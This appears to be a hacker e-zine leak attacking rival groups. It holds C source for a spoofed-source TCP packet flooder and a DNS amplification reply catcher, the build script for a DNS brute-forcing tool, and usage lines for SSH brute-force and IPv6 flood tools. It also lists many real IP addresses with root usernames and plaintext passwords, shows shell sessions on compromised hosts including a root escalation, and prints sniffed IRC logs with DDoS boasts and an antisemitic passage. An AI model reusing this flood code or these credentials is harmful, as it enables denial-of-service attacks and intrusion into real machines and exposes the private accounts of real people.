memcpy(buf+4*ih->ip_hl, th, sizeof(*th)); memcpy(buf+4*ih->ip_hl+sizeof(*th), data, dlen); memset(buf+4*ih->ip_hl+sizeof(*th)+dlen, 0, 4); ih->ip_sum=ip_sum(buf, (4*ih->ip_hl + sizeof(*th)+ dlen + 1) & ~1); memcpy(buf, ih, 4*ih->ip_hl); sin.sin_family=AF_INET; sin.sin_port=th->th_dport; sin.sin_addr.s_addr=ih->ip_dst.s_addr; if(sendto(datapipe, buf, 4*ih->ip_hl+sizeof(*th)+dlen, 0, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Error sending packet.\n"); perror(""); exit(1); } } unsigned long make_tcp_pkt(unsigned long their_ip, unsigned short port, unsigned long woop, unsigned long spewf) { int i, s, c, nignog; struct ip ih; struct tcphdr th; struct sockaddr_in sin; int sinsize; unsigned short myport=6969; char buf[1]; struct timeval tv; srandom(time(NULL)+woop-1); ih.ip_v=4; ih.ip_hl=5; ih.ip_tos=0; ih.ip_len=sizeof(ih)+sizeof(th); ih.ip_id=htons(random()+woop-3); ih.ip_off=0; ih.ip_ttl=255; ih.ip_p=IPPROTO_TCP; ih.ip_sum=0; if(spewf==0) ih.ip_src.s_addr=random()+getpid()+woop+3; else ih.ip_src.s_addr=spewf; ih.ip_dst.s_addr=their_ip; th.th_sport=htons(random()+getpid()+woop); th.th_dport=htons(port); th.th_seq=0; th.th_off=sizeof(th)/4; th.th_ack=(random()+woop-1); switch(pkttype) { case 1: th.th_flags = 0x02; case 2: th.th_flags = 0x10; case 3: th.th_flags = 0x01; case 4: th.th_flags = 0x04; case 5: th.th_flags = 0x20; case 6: th.th_flags = 0x08; default: die; } th.th_win=(random()+woop-2); th.th_sum=0; th.th_urp=1; send_tcp_pkt(&ih, &th, NULL, 0); } void main(int argc, char *argv[]) { int i, x, diff, stawp=0; unsigned long them, me_fake; unsigned lowport, highport; int ret, w, j, a, b, c, d; int randspoof=0; unsigned char blk[3], *p; char nukesrc[128]; struct { int one; int two; int three; } orig; strcpy(version, "v");strcat(version, ".");strcat(version, "4"); strcat(version, "0");strcat(version, "3"); signal(SIGINT, die);signal(SIGQUIT, die);signal(SIGKILL, die); signal(SIGTERM, die);signal(SIGSTOP, die); rend=0; a=0;b=0;c=0;d=0; if(argc<6) { usage(argv[0]); } them=getaddr(argv[2]); lowport=atoi(argv[3]); highport=atoi(argv[4]); pkttype=atoi(argv[5]); if(pkttype!=1 && pkttype!=2 && pkttype!=3 && pkttype!=4 && pkttype!=5 && pkttype!=6) usage(argv[0]); if(argc==7) { stawp=atoi(argv[6]); } datapipe=socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if(datapipe<0) { perror("socket (raw)"); exit(1); } i = 1; diff = (highport - lowport); if (diff > -1) { for (p = argv[1], ret = 0; *p; *p++) { if (*p == '.') ret++; if (ret > 2) { printf("Invalid block.\n"); exit(-1); } } if((ret == 0)&&(atoi(argv[1])==0)) randspoof=1; p = argv[1]; d = 0; for (w = 0; w < ret + 1; w++) { memset((char *)blk, 0, 3); for (j = 0; *p; *p++) { if (*p == '.') break; blk[j++] = *p; } if (w == 0) a = atoi(blk); if (w == 1) b = atoi(blk); if (w == 2) c = atoi(blk); *p++; } orig.one=a; orig.two=b; orig.three=c; if(stawp > 0) { signal(SIGALRM, die); alarm(stawp); } startt=time(0); while(1) { for (x=lowport;x<=highport;x++) { if(randspoof == 0) { if (d > 255) { if (c < 255) { c++; if((ret == 2) && (orig.three != c)) c=orig.three; d = 0; } else { if (b < 255) { b++; if((ret == 1) && (orig.two != b)) b=orig.two; c = 0; d = 0; } else { if (a < 255) { a++; if((ret == 0) && (orig.one != a)) a=orig.one; b = 0; c = 0; d = 0; } else { break; d=0; } } } } sprintf(nukesrc, "%d.%d.%d.%d", a, b, c, d); me_fake=getaddr(nukesrc); make_tcp_pkt(them, x, rend, me_fake); d++; } else { make_tcp_pkt(them, x, rend, 0); } rend++; } } } else { usage(argv[0]); exit(1); } } !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!! !!! MGN u R AXED !!! !!!!!!!!!!!!!!!!!!!! ~\-> ./mcd ++ magnum catch (v1.3) ++ + magnum(11:2004) + ./mcd : amount of time to listen : port to listen on (m) .;magnum(2004);. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ~\-> cat mcd.c|more /* (cid@magnum:11/2003) magnum-catch-ns v1.1,v1.2 want to add a list checker making fopen use append... cleaned things up a bit, made it nicer , added port cmd line opt. magnum-catch-ns v1.0 catch 'certain sized' replies from name servers to use this, i just use magnum-dns (md-*) to "attack" the host running this program. I hit it for about 1 - 5 seconds and watch for the replies. Replies which are bigger than a defined length, get logged into the defined output file. -cid test function on md attack to sends packets to random addresses. the victim ip will be the ip of the server running this program. log all ips with reply above 500bytes */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define OUT_FILE "new.list" /* file to put good ips in */ #define KEEP_SIZE 2500 /* only keep replies greater than */ #define DISPLAY_TIME 3 /* display stats every x seconds */ struct sockaddr_in s_in; int main(int argc, char *argv[]) { char buf[8192], addr[256]; int s, sd, len, on = 1, port, length; long county = 0, count = 0, ssize = 0, scount = 0; long int size = 0; long xtime, stime; long ip; struct sockaddr_in client, serv; FILE *fd; printf("++ magnum catch (v1.3) ++\n"); printf("+ magnum(11:2004) +\n"); printf("\n"); if (argc < 3) { printf("%s \n", argv[0]); printf(" : amount of time to listen\n"); printf(" : port to listen on\n"); printf("\n\n(m) .;magnum(2004);.\n"); exit(0); } port = atoi(argv[2]); xtime = time(NULL); stime = (time(NULL) + DISPLAY_TIME); fd = fopen(OUT_FILE, "a"); serv.sin_family=AF_INET; serv.sin_port=htons(port); serv.sin_addr.s_addr=htonl(INADDR_ANY); if ((sd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { perror("socket"); exit(-1); } fcntl(sd, F_SETFL, O_NONBLOCK); bind(sd, (struct sockaddr *) &serv,sizeof(serv)); len = sizeof(client); printf("(m) port %i -/- %i seconds.\n", port, atoi(argv[1])); while(1) { if (time(NULL) >= (xtime + atoi(argv[1]))) break; if (time(NULL) >= stime) { /* printf("(m) good(%u) -/- %u Kbyte/s @ %u PPS.\n", \ county, (ssize / DISPLAY_TIME / 1024), \ (scount / DISPLAY_TIME)); */ ssize = 0; scount = 0; stime = (stime + DISPLAY_TIME); } length = recvfrom(sd, buf, sizeof(buf), 0, \ (struct sockaddr *)&client, &len); if (length != -1 && length != 0) { size += length; ssize += length; count++; scount++; if (length >= KEEP_SIZE) { // printf("recv len: %i\n", length); county += 1; sprintf(addr, "%s\n", \ inet_ntoa(client.sin_addr)); fputs(addr, fd); } } } fclose(fd); printf("(m) total ips kept : %u ips\n", county); printf("(m) total data received : %lu bytes\n", size); printf("(m) total packets received: %u packets\n", count); printf("(m) keep size : %i bytes\n", KEEP_SIZE); printf("\n\n(m) .;magnum(2004);.\n"); return(0); } !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ~\-> ls;cat mk ./ ../ libmdns/ libmutil/ mk* ps.h #!/bin/sh OS=`uname` ARCH=`uname -m` if [ $OS = "SunOS" ]; then MG_OPT="-lsocket -lnsl -ldl" fi if [ $OS = "IRIX" ]; then MG_OPT="-lsocket -lnsl -ldl" fi CC="gcc" ILIBS="libmutil/libmutil*.a libmdns/libmdns.a" SRCS="monoxide.c" OUTPUTFILE="mxide3" rm -f $OUTPUTFILE echo "(mGn) monoxide v1.7, dns id brute forcing, repeat requests." echo echo " -> OS : $OS :: $ARCH" echo " -> OPT : $CC $MG_OPT" echo " -> FILES : $SRCS" echo " -> LIBS : $ILIBS" echo " -> EXEC : $OUTPUTFILE" echo rm *.core >/dev/null 2>/dev/null echo -n "(mGn) building libmutil: " cd libmutil; ./mk >/dev/null 2>/dev/null; cd .. echo "Done." echo -n "(mGn) building libmdns: " cd libmdns; ./mk >/dev/null 2>/dev/null; cd .. echo "Done." echo "(mGn) building, linking mOnOxIDe(v1.7): " echo "" echo "$CC -o $OUTPUTFILE $MG_OPT $ENABLE_SWAP $SRCS $ILIBS" echo "" $CC -o $OUTPUTFILE $MG_OPT $ENABLE_SWAP $SRCS $ILIBS echo "(mGn) Done." strip $OUTPUTFILE ; ls -l $OUTPUTFILE !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ==>> LABSEC BNC SHELLSSSSSSSSSSSSSSSSSS <<== .... 7h15 15 4 v3ry l337 gr0up, u51n9 s4m3 pwd 1n d1ff3r3n7 b0x5.. OFMGGGGGGGG ... 62.75.216.208:juca666 (root:e0d1b5ce) -- Linux alster204 2.6.8-24.16-smp #1 SMP Thu Jun 2 12:09:57 UTC 2005 i686 i686 i386 GNU/Linux 150.162.105.1:juca666 -- Linux gauss 2.6.11.4-21.10-default #1 Tue Nov 29 14:32:49 UTC 2005 i686 i686 i386 GNU/Linux gauss.grima.ufsc.br pam_from: 80.108.247.157 user: root pass: e0d1b5ce pam_from: 80.108.247.157 user: root pass: e0d1b5ce pam_from: 80.108.247.157 user: root pass: e0d1b5ce pam_from: 85.125.117.50 user: root pass: e0d1b5ce pam_from: 80.108.247.157 user: root pass: e0d1b5ce ----------------------------------------------------------------------------- 128.192.0.46:juca666 -- OpenBSD moondog.uga.edu 3.3 GENERIC#44 i386 ---------------------------------------------------------------------------------------- pass_from: ::ffff:66.252.13.131 user: root pass: ch63@ut! pass_from: ::ffff:64.215.27.94 user: root pass: ch63@ut! -- CISCO pass_from: ::ffff:206.104.155.161 user: root pass: juca666 -- CISCO root@mail.interop.net's password:juca666 --------------------------------------------------------------------- -bash-3.1# host 66.252.13.131 131.13.252.66.in-addr.arpa domain name pointer duff.darklogic.net. 131.13.252.66.in-addr.arpa domain name pointer gate.operations.net. 131.13.252.66.in-addr.arpa domain name pointer labsec.operations.net. 131.13.252.66.in-addr.arpa domain name pointer special.operations.net. -bash-3.1# host 66.252.13.132 132.13.252.66.in-addr.arpa domain name pointer mosdef.darklogic.net. 132.13.252.66.in-addr.arpa domain name pointer fx.exploit.org. 132.13.252.66.in-addr.arpa domain name pointer md5.crypto.net. 132.13.252.66.in-addr.arpa domain name pointer duff.brasirc.org. 132.13.252.66.in-addr.arpa domain name pointer free.bsd.us. 132.13.252.66.in-addr.arpa domain name pointer mini.cat. 132.13.252.66.in-addr.arpa domain name pointer execl.exploit.org. 132.13.252.66.in-addr.arpa domain name pointer labsec.exploit.org. ~\-> cat lol|wc -l 328 ~\-> cat lol|more 2to: 130.75.26.134 user: reuter pass: ******* we cant show :) 2to: 130.75.26.134 user: reuter pass: ******* we cant show :) 2to: 130.75.26.134 user: reuter pass: ******* we cant show :) 2to: 130.75.26.134 user: reuter pass: ******* we cant show :) 2to: 130.75.26.134 user: reuter pass: ******* we cant show :) 2to: 18.38.1.121 user: reuter pass: ******* we cant show :) 2to: 130.75.26.134 user: reuter pass: ******* we cant show :) 2to: 130.75.26.134 user: reuter pass: ******* we cant show :) 2to: 130.75.26.134 user: reuter pass: ******* we cant show :) 2to: 18.38.1.121 user: reuter pass: ******* we cant show :) 2to: 18.38.1.121 user: reuter pass: ******* we cant show :) 2to: 18.7.16.69 user: reuter pass: ******* we cant show :) 2to: 18.7.16.69 user: reuter pass: ******* we cant show :) ** oh coooll!! log of some .edu boxs (FBI REALLY WILL LIKE YOU) sending........... wanted@fbi.gov ** moreeeeee...................... ~\-> wc -l mit.edu 279 mit.edu ~\-> cat mit.edu|more mit.edu /usr/lib/pwlib/devices/libpng 2to: 18.58.1.76 user: root pass: ******* we cant show :) 2to: 18.38.0.40 user: baker pass: ******* we cant show :) 2to: 18.38.0.40 user: baker pass: ******* we cant show :) 2to: 18.7.16.70 user: harishm pass: ******* we cant show :) 2to: 18.7.16.70 user: harishm pass: ******* we cant show :) 2to: 18.58.1.76 user: root pass: ******* we cant show :) 2to: 18.38.0.40 user: baker pass: ******* we cant show :) 2to: 18.38.0.203 user: modarres pass: ******* we cant show :) ~\-> wc -l shells 5648 shells OH MY GOD... REALLY REQUERSS EL8888888888 POKEMON !! 5648 SHELLSSS!!! BUT OWNED!! LOLLLLLLLLLLLL 2to: 212.202.219.21 user: root pass: juca666 2to: 150.162.45.1 user: leeloo pass: juca666 2to: 69.93.123.66 user: root pass: juca666 2ito: 150.162.6.1 user: root pass: juca666 2ito: 150.162.6.1 user: leeloo pass: juca666 2to: 67.18.151.106 user: root pass: juca666 2to: 69.93.78.178 user: root pass: juca666 2ito: 205.234.198.3 user: root pass: juca666 2to: 69.93.123.66 user: root pass: juca666 2ito: 200.18.45.92 user: root pass: juca666 2ito: 200.18.45.90 user: root pass: juca666 ........................ ...................... .................... to be continued!! :)) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ~\-> cd lpd; ./bridge SSHBrute v1.4 - Tal0n [cyber_talon@hotmail.com] on 09-04-04 Usage: ./bridge -brute || -grab || -help ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ // ipv6 flooder # ./6 Usage: 6 [-6] ip4/6 [port] [delay (ms)] [times] ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ~\->ssh 72.20.13.1 -l klux klux@72.20.13.1's password: Last login: Wed Aug 22 21:19:16 2007 from F sh-2.05$ uname -a FreeBSD box.observers.net 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #7: Mon Oct 23 15:14:33 PDT 2006 checking logs of psybnc....... Tue Aug 21 22:27:23 :(xbugs!bugs@67.43.224.204) [KICKED] from #!!!magnum (h4h4) ... kicked from magnum ? oh cool!! ok... next... =================================================================================================== \->ssh 72.20.13.13 -l klux klux@72.20.13.13's password: Last login: Wed Aug 22 21:19:16 2007 from F sh-2.05$ uname -a FreeBSD box.observers.net 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #7: Mon Oct 23 15:14:33 PDT 2006 # oh klux... very hard!!! u cant card dedicated servers!!!!!!!! =================================================================================================== \->ssh 66.240.231.65 -l klux klux@66.240.231.65's password: Last login: Wed Aug 22 21:19:16 2007 from x0x0x.x0x0x.x0x0x.x0x0x sh-2.05$ uname -a Linux dlx1 2.6.8-3-686-smp #1 SMP Tue Dec 5 23:17:50 UTC 2006 i686 GNU/Linux sh-2.05$ cat l4m4h.5n1ff|grep klux ****2ito: 72.20.13.1 user: klux pass: xfera123 - FreeBSD box.observers.net 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #7: Mon Oct 23 15:14:33 PDT 2006 ****2ito: 72.20.13.13 user: klux pass: xfera123 - FreeBSD box.observers.net 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #7: Mon Oct 23 15:14:33 PDT 2006 ****2ito: 66.240.231.65 user: klux pass: bala123 - Linux dlx1 2.6.8-3-686-smp #1 SMP Tue Dec 5 23:17:50 UTC 2006 i686 GNU/Linux ****2ito: 88.198.51.138 user: klux pass: bala123 ??????????????????????????????????????? ???? yeah klux , you are really 2ito!!! ???? +++++++++++++++++++++++++++++++++++++ +++++++++ PROOF OF CONCEPT ++++++++++ +++++++++++++++++++++++++++++++++++++ I will show now some of klux's b0x: 2ito: 69.90.99.196 user: root pass: juca666 - Linux jeeves.voxter.ca 2.6.17-2-686 #1 SMP Thu Aug 31 12:53:18 UTC 2006 i686 GNU/Linux ****2ito: 65.39.152.239 user: root pass: juca666 (n3wp4ss) - Linux white.metrobridge.net 2.6.11.7 #1 SMP Wed Apr 20 01:52:44 PDT 2005 i686 GNU/Linux 2to: 69.90.99.195 user: root pass: juca666 - Linux donkey 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux 2to: 62.75.252.248 user: root pass: juca666 - Linux server 2.4.21-303-athlon #1 Tue Dec 6 12:24:00 UTC 2005 i686 athlon i386 GNU/Linux 2ito: 66.119.169.249 user: root pass: juca666 - Linux tunnel2.metrobridge.net 2.6.10 #1 Tue Feb 8 00:35:11 PST 2005 i686 GNU/Linux !!2to: 74.221.128.90 user: root pass: juca666 - Linux ns2.phx.metrobridge.net 2.6.18-4-486 #1 Wed Feb 21 15:25:16 UTC 2007 i686 GNU/Linux 2ito: 83.133.82.77 user: root pass: juca666 - Linux rocoto067 2.6.16.1-amd-webperoni-06042006-1 #1 Thu Apr 6 17:01:51 CEST 2006 i686 athlon i386 GNU/Linux 2ito: 80.86.82.237 user: root pass: juca666 - Linux q-serwer 2.6.15.4-amd #1 SMP Fri Feb 24 22:35:17 CET 2006 i686 athlon i386 GNU/Linux + This REQUER use default password as juca666! really one GOOOOOOOOOOOOOOOOOOOD admin... + + klux have approximately 6000 machines with juca666 password and others 2. + + next zine we will post all boxs with root password ;) [[[.-.]]] serh the packet/bnc MAN! He´s el8 p0k3m0n [[[.-.]]] \-> ssh 66.252.8.107 -l serh serh@66.252.8.107's password: Last login: Wed Sep 5 14:38:04 2007 from x0x0x.x0x0x.x0x0x.x0x0x .__ .___ __ .__ |__| __| _/____ _____/ |_|__|__ ___ | |/ __ |/ __ \ / \ __\ \ \/ / | / /_/ \ ___/| | \ | | |> < |__\____ |\___ >___| /__| |__/__/\_ \ \/ \/ \/ \/ welcome to identix your friendly admins: phil: phil@identixonline.com rage: corefocus@gmail.com This is a PRIVATE server. You are privilaged to even have an account on this box. Do not abuse it, we will find out. ALL activity is monitored and logged. DO NOT allow anyone other than yourself use your account on this machine. If caught abusing the system, your account will be deleted - no exceptions. If I find you hacking, packeting, using this as a dump site, or anything else stupid, you will be banned for life and will have your toenails pryed off with a flathead screwdriver. Oh and yeah, you will also be prosecuted to the fullest extent of the law. Only if I'm having a bad day. Basically don't fuck with us. Now that we have all that clear enjoy our box and feel free to drop any suggestions/comments to either rage or myself. - phil -+ NEWS +- 2.12.07 Thanks to Rage our resources have been upgraded and we have a decent amount of HD space and RAM. We still ask that you be conservative with our resources and not to abuse them. If I find processes that are hogging resources I will kill them and msg you regarding such processes. If you continue to abuse the resources after we talk I will userdel and not think twice about it. RESPECT IS EVERYTHING. THANKS RAGE!! -+ Commands : COMING SOON!!!! (I know I am a slacker) -+ 'vhosts' for a list of useable vhosts. -+ 'getegg' for eggdrop. -+ 'getbnc' for bnc. -+ 'BitchX' for irc client. *WORKING* -+ more to come ... Please note that you can review this motd at any time simply by typing the command 'motd'. * NO OUTBOUND IRC ACCESS ANYWHERE UNTIL WE CONFIGURE ALL IPS AND DOMAINS. IF I CATCH ANY IRC PROCESS, I WILL KILL IT. -RAGE -bash: /dev/null: Permission denied -bash: /dev/null: Permission denied -bash: /dev/null: Permission denied -bash: /dev/null: Permission denied -bash: /dev/null: Permission denied -bash: /dev/null: Permission denied -bash: /dev/null: Permission denied +-(serh@identix) +-(~)-> uname -a Linux identix 2.6.8-022stab078.10-smp #1 SMP Wed Jun 21 12:11:05 MSD 2006 i686 i686 i386 GNU/Linux +-(serh@identix) +-(~)-> ls psyBNC-2.3.2-7.tar.gz psyBNC-2.3.2-7.tar.gz.1 psybnc ............... ............... ............... +-(serh@identix) +-(~)-> ./dump /bin/sh bash$ id uid=0(root) gid=0(root) groups=0(root) ********************************************************** ** OH MY GOOOOOOOOOD! GOOD ADMIN! lol!!! lets sniff it! ** ********************************************************** times later................ */ el8 pokemon sniff log 08-09/2007 /* #u-labs: | serh (phil@sdrawkcab.net) #u-labs: | name : User Phil #u-labs: | serv : irc.he.net #u-labs: yours ? #u-labs: its so mush drama #u-labs: what you do after you wpn all #u-labs: pwn #u-labs: all #u-labs: see, drama nver ends #u-labs: I have ended it #u-labs: no #u-labs: its just a idiot #u-labs: inc want packet any more #u-labs: im shure #u-labs: if he does, we fuck him up ? #u-labs: you will not #u-labs: heh why themar? #u-labs: It ends #u-labs: right here #u-labs: yes #u-labs: no more packets, no more jupes #u-labs: no more nothin #u-labs: lol #u-labs: nick have been dronord #u-labs: some time ago proble PRIVMSG: => : i guess i will PRIVMSG: => : stop all this shit PRIVMSG: => : heh PRIVMSG: => : Do what you want, but drama never ends PRIVMSG: => : listen PRIVMSG: => : cid is in prison for ddos PRIVMSG: => : lool PRIVMSG: => : how you know? PRIVMSG: => : along with ashley PRIVMSG: => : the x owner of foonet PRIVMSG: => : aka gige PRIVMSG: => : hehe PRIVMSG: => : do you join undernet? PRIVMSG: => : i gotta PRIVMSG: => : get a new vps PRIVMSG: => : from gige PRIVMSG: => : juppp PRIVMSG: => : say10 PRIVMSG: => : heh PRIVMSG: => : will not PRIVMSG: => : sell shit PRIVMSG: => : to me PRIVMSG: => : i ordred one PRIVMSG: => : to vps.cbras.com PRIVMSG: => : ryan1918 PRIVMSG: => : what about him PRIVMSG: => : i dunno him PRIVMSG: => : whois that PRIVMSG: => : dunno PRIVMSG: => : :( PRIVMSG: => : you got some bots in ur ircd? PRIVMSG: => : no PRIVMSG: => : its all gone PRIVMSG: => : k PRIVMSG: => : and my ftp isnt workin PRIVMSG: => : :( ic PRIVMSG: => : i have to download a new one PRIVMSG: => : and im so fuckin lazy PRIVMSG: => : im bored PRIVMSG: => : lol PRIVMSG: => : heh PRIVMSG: => : me2 PRIVMSG: => : my friend PRIVMSG: => : told me PRIVMSG: => : that include PRIVMSG: => : had choopa's box PRIVMSG: => : irc.choopa.com PRIVMSG: => : and they are sniffin efnet // 0h my 90d!! inc1ud3 h4v4h ch00p4 ?!?!?!?! 1 th1nk n07!!!! // [root@irc ~]# uname -a // Linux irc.choopa.net 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux // [root@irc ~]# PRIVMSG: => : qrazy PRIVMSG: => : dont you know PRIVMSG: => : a good vps ocmpany? PRIVMSG: => : on gige PRIVMSG: => : ? #sysadmins: coredata: to OU's and shit? #sysadmins: clustering you need r2 enterprise or datacenter edition. #sysadmins: samurai_: like when one guy queues up a 200 page print job #sysadmins: yip #sysadmins: so that's pricey :( #sysadmins: yeep #sysadmins: sheppard: true. #sysadmins: i only roll enterprise, baby PRIVMSG: => : nope PRIVMSG: => : i was told to get one here by a friend PRIVMSG: => : k PRIVMSG: => : t0xic PRIVMSG: => : heh PRIVMSG: => : jupp PRIVMSG: => : just 5 bux month? PRIVMSG: => : because i didnt paid for that vps PRIVMSG: => : i payd 25 PRIVMSG: => : i can tell ya how i get my vos PRIVMSG: => : i ddosd PRIVMSG: => : all the guyz PRIVMSG: => : from the chan PRIVMSG: => : fastsolutions PRIVMSG: => : and a jerk came in PRIVMSG: => : he said he needs help PRIVMSG: => : because PRIVMSG: => : his vps PRIVMSG: => : doesnt work PRIVMSG: => : i told him to give me the root pass PRIVMSG: => : lol PRIVMSG: => : and i ripped it PRIVMSG: => : hahaha PRIVMSG: => : datz how i get that PRIVMSG: => : lo PRIVMSG: => : l #Fast-Solutions: ACTION slaps _say10 around a bit with a large trout PRIVMSG: => : that sucker say10 PRIVMSG: => : si around? PRIVMSG: => : idono #venetia: ACTION brb la dush PRIVMSG: => : [10:30pm] *** W3bs (~W3bs@ti511110a080-2760.bb.online.no) has joined #null #arkansas: Good evening. #arkansas: brb #Albania: PERSHENDETJE GJITHE SHQIPETAREVE #Albania: a ka njeri zgjuar apo jeni te gjithe ne gjume #coma: yo #coma: <_coma> whatup #venetia: ACTION back #u-labs: serh #u-labs: lets grab your nick #u-labs: tnx #u-labs: np man #u-labs: look at this serh #u-labs: yea #u-labs: show me #u-labs: heh #u-labs: boo #u-labs: hi dude #u-labs: im going to work #u-labs: see ya #u-labs: see ya #u-labs: heya #u-labs: heye afriend #u-labs: sup? #u-labs: my big friend #u-labs: fine, thanks! :) #u-labs: hehe #u-labs: and you? #u-labs: i'm fine too thanks;) #u-labs: does Felippe de Meirelles Motta, meen, Felippe your pensis sucks ? #u-labs: hahaha #u-labs: learn to get whois ? #u-labs: lool themar #u-labs: I dont get whoois #u-labs: omg, btw who are you themar ? #u-labs: IM new #u-labs: here #u-labs: Im a total idiot #u-labs: with no skills at all #u-labs: what so ever #u-labs: hehehe, welcome then! :) #u-labs: Ntx #u-labs: zback #coma: yoyo #coma: <_coma> sup man. i just got home. #coma: <_coma> about to cook some shit up #coma: <_coma> starving. heh #coma: word #coma: im wicked stoned #u-labs: sup #u-labs: ;) #coma: yo #u-labs: XgeN ;) #u-labs: I have been sleepin for 12 houres #u-labs: xDD #u-labs: Im fuckin not tired no moree #venetia: <[Orpen]> ACTION is away (4A7way4! 1Back Later ) #Albania: tung #Albania: ... #venetia: ACTION neatza #u-labs: "Jewish people are KHAZARS for the most part with negroid DNA. Jew is NOT synonymous with biblical israelite.Not all jews are khazars-some are most likely israelites? akin to their european brethren worldwide.The Israel government is run by CORRUPT Zionist khazars who have infiltrated every gove rnment worldwide trying to implement a supremacist NWO." #u-labs: what to do ? #u-labs: serh #u-labs: sup #u-labs: Nm #u-labs: chillin #u-labs: what about you #u-labs: ? #u-labs: lol #u-labs: nice vhost #u-labs: haha #u-labs: lol #u-labs: you bought it? #u-labs: nope #u-labs: i made #u-labs: ./whois b33r #u-labs: its mine too #u-labs: hehe cool #u-labs: into ur box? #u-labs: some planets #u-labs: =] #u-labs: cool #u-labs: resolve my dns #u-labs: i need a vhost like this #u-labs: yea #u-labs: its ipv6 #u-labs: labsec.us box #u-labs: hehe #u-labs: hehe #u-labs: you owned tht? #u-labs: ./dns labsec.got.strangled.net #u-labs: [DNS] Looking up labsec.got.strangled.net... #u-labs: [DNS] Canonical: labsec.got.strangled.net Numerical: 77.232.81.37 #u-labs: Yea #u-labs: [DNS] Looking up labsec.us... #u-labs: [DNS] Canonical: labsec.us Numerical: 77.232.81.37 #u-labs: * Dns resolved labsec.got.strangled.net to 77.232.81.37 #u-labs: cool] #u-labs: nice mate #u-labs: i will buy a gige shell #u-labs: and join back #u-labs: in some channs #u-labs: heh #u-labs: i wanna see some labsec reactions #u-labs: heh #u-labs: you juped klux's nick? #u-labs: nope #u-labs: Mega_ #u-labs: dtr juped klux nick #u-labs: is oyu? #u-labs: yea #u-labs: but mega is you? #u-labs: MEGA_ #u-labs: MeGa_ #u-labs: its you? #u-labs: HEH #u-labs: you can keep #u-labs: it if is you #u-labs: if its you #u-labs: but i thought is the real mega #u-labs: and shit #u-labs: heh labsec.got.strangled #u-labs: lol #u-labs: nice #u-labs: haha #coma: yo #u-labs: who is jhood? #u-labs: me #u-labs: heh #u-labs: spyinG #NULL chan #u-labs: ssh labsec.got.strangled.net -l root #u-labs: root@labsec.got.strangled.net's password: #u-labs: > id #u-labs: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) // 0h my g0d 494in!!!!!!!!!!!!!!!!!!! // l4b53c 0wn3d ?!?!?!?!? 7h15 i5 r3411y n3w!!!!!!! 101111111111111111111!!! #u-labs: hehe #u-labs: nive:) #u-labs: Nice #u-labs: labsec = dead // l37'5 90 c0rr3c7 s3r7............................................ // // labsec && serh = dead #u-labs: lol #u-labs: it camed back #u-labs: lol #u-labs: u lost ur nickw #u-labs: lol #u-labs: ? #u-labs: nno #u-labs: nop #u-labs: datz a friend #u-labs: fuck dude u got 1000 serhs nicks #u-labs: but they all think #u-labs: that they #u-labs: this is fear? #u-labs: that he #u-labs: juped my nickname #u-labs: datz why #u-labs: he keeps it for me #u-labs: to stop the ddos attacks #u-labs: for a while #u-labs: my nick isnt juped #u-labs: heh // lolllllllll!!! serh havah a solution to jupe nicknames... // // +-(serh@identix) // +-(~)-> killall -9 psybnc // +-(~)-> // // * Serh` has quit IRC (Connection reset by peer) // * S3r7 has quit IRC (Connection reset by peer) // // "Ops! I did'nt again!" (Britney Spears) #u-labs: what means #u-labs: saq #u-labs: ? #u-labs: serh against quotes? #u-labs: lol #u-labs: =] #u-labs: lool #u-labs: hah #u-labs: dunno #u-labs: op me #u-labs: heh PRIVMSG: => : op me #u-labs: if u are serh #u-labs: what is my another nickname #u-labs: yea #u-labs: who starts #u-labs: with #u-labs: d #u-labs: =] #u-labs: dinamic #u-labs: lol #u-labs: th #u-labs: x #u-labs: lol #u-labs: it's serh #u-labs: like this vhost? #u-labs: hehe #u-labs: yea #u-labs: cool #u-labs: i like it hehe #u-labs: brb #u-labs: i will restart my pc #coma: <_coma> sup sup #u-labs: back #u-labs: :) #u-labs: back #u-labs: heh #u-labs: i must restart my pc #u-labs: * dexa__ was kicked by uniq (banned) #u-labs: <[-Craig-]> o.0 #u-labs: lol #u-labs: what happened with dexa #u-labs: lol #u-labs: what happened with dexa #u-labs: <[-Craig-]> o.0 #u-labs: lol #u-labs: what happened with dexa #u-labs: include- appeared #u-labs: haha #u-labs: the dark man #u-labs: include #u-labs: hahaha #u-labs: the dark man #u-labs: include #u-labs: hahaha #u-labs: haha #u-labs: the dark man #u-labs: include #u-labs: hahaha // until serh it jeers include! l0l // ................................ #u-labs: what is dexa? #u-labs: a guy #u-labs: tear #u-labs: ? #u-labs: i dunno who is him #u-labs: i dont know #u-labs: that guy #u-labs: nn #u-labs: mm #u-labs: xbugs seems around #u-labs: * include- has joined #blackhats #u-labs: hhh #coma: wut up 